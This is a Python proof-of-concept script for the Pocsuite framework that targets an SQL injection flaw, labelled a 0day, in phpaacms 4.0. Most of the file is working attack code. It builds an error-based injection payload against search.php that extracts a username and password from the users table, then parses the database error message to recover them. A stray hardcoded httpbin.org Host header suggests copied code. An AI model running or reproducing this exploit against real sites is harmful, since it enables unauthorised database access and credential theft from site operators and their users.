#!/usr/bin/python # -*- coding: utf-8 -*- # If you have issues about development, please read: # https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md # https://github.com/knownsec/Pocsuite/blob/master/docs/COPYING from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils import register import re def send_command(url): try: httpreq = req.Session() headers ={ "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8", "Connection": "close", "Cookie": "_gauges_unique_month=1; _gauges_unique_year=1; _gauges_unique=1; _gauges_unique_hour=1; _gauges_unique_day=1", "Host": "httpbin.org", "Referer": "http://httpbin.org/", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36" } resp = httpreq.get(url, headers=headers) except: resp = None return resp class TestPOC(POCBase): name = 'phpaacms 4.0 Sql 注入0day漏洞'.decode('utf-8') vulID = '0' author = ['小雨'] vulType = 'sql_inj' version = '1.0' # default version: 1.0 references = ['https://www.webshell.cc/7.html'] desc = '''phpaacms 4.0 Sql 注入0day漏洞''' createDate = '2017.12.20' appName = 'phpaacms' appVersion = '4.0' def _attack(self): '''attack mode''' result = {} self.url = self.url + "/search.php?id=1+and(select+1+from(select+count(*),concat((select+(select+(SELECT+concat(phpaacms_users.username,0x23,password)+FROM+`phpaa`.phpaacms_users+LIMIT+1,1)+)+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1" resp = send_command(self.url) if resp and resp.text and resp.status_code == 200: info = re.findall(r'entry \'(.+?)\' for', resp.text) if len(info) > 0: info1 = info[0].split('#') result['Database'] = {} result['Database']['user'] = info1[0] result['Database']['password'] = info1[1] return self.parse_output(result) def _verify(self): '''verify mode''' return self._attack() def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('Internet nothing returned') return output register(TestPOC)